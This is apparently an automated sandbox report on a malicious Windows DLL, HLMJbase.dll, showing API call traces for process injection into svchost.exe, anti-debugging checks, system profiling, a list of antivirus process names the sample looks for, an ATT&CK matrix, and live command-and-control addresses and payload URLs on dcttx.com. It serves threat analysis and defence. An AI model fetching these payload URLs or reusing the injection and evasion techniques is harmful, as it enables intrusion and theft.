Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055ADE70 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,4_2_055ADE70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055AEF64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_055AEF64
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055B1EC7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_055B1EC7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030A6530 SetUnhandledExceptionFilter,GetConsoleWindow,ShowWindow,GetCurrentThreadId,PostThreadMessageA,GetInputState,CreateThread,WaitForSingleObject,CloseHandle,Sleep,5_2_030A6530
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030AAFAE SetUnhandledExceptionFilter,5_2_030AAFAE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030A8678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_030A8678
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030A69D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_030A69D5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0535DE70 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,5_2_0535DE70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0535EF64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0535EF64
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05361EC7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_05361EC7
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 38.147.186.138 443Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.204.213.99 7677Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04205830 _memset,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,3_2_04205830
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB7760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,3_2_04DB7760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055A7760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,4_2_055A7760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05357760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,5_2_05357760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe3_2_04DB7760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe3_2_04DB7760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe4_2_055A7760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe4_2_055A7760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe5_2_05357760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe5_2_05357760
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1Jump to behavior
Source: rundll32.exe, 00000003.00000002.3545527628.0000000004EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3545452480.0000000005814000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3545296964.00000000055C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
Source: rundll32.exe, 00000003.00000003.1859849078.0000000005AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1876997560.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1883764518.0000000006082000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .168.2.4 0 min549163Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
Source: C:\Windows\SysWOW64\rundll32.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,3_2_04DB53C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_055A53C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,5_2_053553C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0420B587 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_0420B587
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DC5D95 __lock,wsprintfW,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_04DC5D95
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB6A00 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,3_2_04DB6A00
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: rundll32.exeBinary or memory string: acs.exe
Source: rundll32.exeBinary or memory string: avcenter.exe
Source: rundll32.exeBinary or memory string: kxetray.exe
Source: rundll32.exeBinary or memory string: vsserv.exe
Source: rundll32.exeBinary or memory string: avp.exe
Source: rundll32.exeBinary or memory string: cfp.exe
Source: rundll32.exeBinary or memory string: KSafeTray.exe
Source: rundll32.exeBinary or memory string: 360Safe.exe
Source: rundll32.exeBinary or memory string: 360tray.exe
Source: rundll32.exeBinary or memory string: rtvscan.exe
Source: rundll32.exeBinary or memory string: TMBMSRV.exe
Source: rundll32.exeBinary or memory string: ashDisp.exe
Source: rundll32.exeBinary or memory string: 360Tray.exe
Source: rundll32.exeBinary or memory string: avgwdsvc.exe
Source: rundll32.exeBinary or memory string: AYAgent.aye
Source: rundll32.exeBinary or memory string: RavMonD.exe
Source: rundll32.exeBinary or memory string: QUHLPSVC.EXE
Source: rundll32.exeBinary or memory string: Mcshield.exe
Source: rundll32.exeBinary or memory string: K7TSecurity.exe
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC4768C bind,GetLastError,3_2_6CC4768C
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media
1
Native API
1
DLL Side-Loading
1
DLL Side-Loading
11
Disable or Modify Tools
121
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Access Token Manipulation
1
Deobfuscate/Decode Files or Information
LSASS Memory11
Peripheral Device Discovery
Remote Desktop Protocol1
Screen Capture
21
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)322
Process Injection
2
Obfuscated Files or Information
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin Shares121
Input Capture
1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS17
System Information Discovery
Distributed Component Object Model2
Clipboard Data
2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
Virtualization/Sandbox Evasion
LSA Secrets31
Security Software Discovery
SSHKeylogging3
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Access Token Manipulation
Cached Domain Credentials21
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items322
Process Injection
DCSync2
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Rundll32
Proc Filesystem1
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Indicator Removal
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
HLMJbase.dll0%ReversingLabs
HLMJbase.dll3%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
dcttx.com
38.147.186.138
truetrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://dcttx.com/19/77.binrundll32.exe, 00000003.00000003.1729874036.00000000028B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2157580790.00000000028AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3543030625.000000000287A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1698661519.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2339917557.00000000028AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1729791896.000000000289D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3542816522.0000000002E9C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1794106955.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1976663029.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699780132.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699722110.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754289743.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754407677.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166846758.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1802814248.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723716813.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3542903898.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723632245.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754193127.0000000002ECD000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      https://dcttx.com/19/7.txtFailedrundll32.exe, rundll32.exe, 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3546373145.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.3546252526.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, HLMJbase.dllfalse
        unknown
        https://dcttx.com/19/77.bin)rundll32.exe, 00000003.00000003.1729874036.00000000028B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1729791896.000000000289D000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://dcttx.com/19/7.txtrundll32.exe, 00000003.00000003.1698661519.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699780132.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723716813.0000000002EE6000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://dcttx.com/19/77.bin8rundll32.exe, 00000005.00000003.1754289743.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754407677.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166846758.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1802814248.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723716813.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3542903898.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754193127.0000000002ECD000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://dcttx.com/19/77.binfrundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://dcttx.com/19/77.binDrundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://dcttx.com/19/7.txt)rundll32.exe, 00000003.00000003.1698661519.00000000028B5000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://dcttx.com/19/77.bin3rundll32.exe, 00000003.00000003.1729874036.00000000028B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1729791896.000000000289D000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://dcttx.com/19/77.binArundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://dcttx.com/19/77.bin_rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://dcttx.com/19/77.bin.rundll32.exe, 00000005.00000003.1754289743.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754407677.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754193127.0000000002ECD000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            38.147.186.138
                            dcttx.comUnited States
                            138576CODECCLOUD-AS-APCodecCloudHKLimitedHKtrue
                            45.204.213.99
                            unknownSeychelles
                            134705ITACE-AS-APItaceInternationalLimitedHKtrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1579416
                            Start date and time:2024-12-22 09:28:08 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 8m 15s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Run name:Run with higher sleep bypass
                            Number of analysed new started processes analysed:10
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:HLMJbase.dll
                            Detection:MAL
                            Classification:mal72.spyw.evad.winDLL@10/0@1/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 109
                            • Number of non-executed functions: 91
                            Cookbook Comments:
                            • Found application associated with file extension: .dll
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtEnumerateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            No simulations
                            No context
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CODECCLOUD-AS-APCodecCloudHKLimitedHKhttp://www.wagtg.comGet hashmaliciousUnknownBrowse
                            • 45.152.115.161
                            ULRmk7oYR7.elfGet hashmaliciousMiraiBrowse
                            • 38.147.162.173
                            file.exeGet hashmaliciousReverse SSHBrowse
                            • 45.152.67.101
                            file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                            • 45.152.113.10
                            file.exeGet hashmaliciousStealcBrowse
                            • 45.152.113.10
                            file.exeGet hashmaliciousStealcBrowse
                            • 45.152.113.10
                            file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                            • 45.152.113.10
                            file.exeGet hashmaliciousStealcBrowse
                            • 45.152.113.10
                            file.exeGet hashmaliciousStealcBrowse
                            • 45.152.113.10
                            ITACE-AS-APItaceInternationalLimitedHKla.bot.arm7.elfGet hashmaliciousMiraiBrowse
                            • 154.223.235.4
                            sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            • 154.194.197.213
                            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            • 154.91.87.201
                            b3astmode.mpsl.elfGet hashmaliciousMiraiBrowse
                            • 156.237.86.243
                            ppc.elfGet hashmaliciousMiraiBrowse
                            • 156.230.199.0
                            hax.mpsl.elfGet hashmaliciousMiraiBrowse
                            • 156.227.127.152
                            hax.arm5.elfGet hashmaliciousMiraiBrowse
                            • 156.237.86.244
                            mpsl.elfGet hashmaliciousMiraiBrowse
                            • 156.235.45.122
                            nshmpsl.elfGet hashmaliciousMiraiBrowse
                            • 156.235.45.170
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0eswift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                            • 38.147.186.138
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                            • 38.147.186.138
                            Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                            • 38.147.186.138
                            Company Information.pdf.lnkGet hashmaliciousUnknownBrowse
                            • 38.147.186.138
                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                            • 38.147.186.138
                            Fatura227Pendente576.pdf674.msiGet hashmaliciousUnknownBrowse
                            • 38.147.186.138
                            No context
                            No created / dropped files found
                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.62577478877575
                            TrID:
                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                            • Generic Win/DOS Executable (2004/3) 0.20%
                            • DOS Executable Generic (2002/1) 0.20%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:HLMJbase.dll
                            File size:1'071'104 bytes
                            MD5:250eb1ef1645f13252ef13c14ba66d51
                            SHA1:4aa14d113af1d74fbd1adbc16c10126b69878d0b
                            SHA256:dacdac1e333a1f45700e3707e617ff49c457226604f1ffa160fc3faf9b6810b3
                            SHA512:e8afc0d6c8c089a8cb1802e21a115961941951ef40d6d553f41980a0c40f9a0644220ba9c55623711f8928e1d47723e9f3d896bcce3806d181d509318ac78f6b
                            SSDEEP:24576:X8vRHK4uhXIAnszgnvuscGteHwoXilrEAfTo:V4rewws0rfc
                            TLSH:BB35AE40EAD3C5BBDD4F2474642FF33FDB32560A8338D693EBE42DB5A86A361541A106
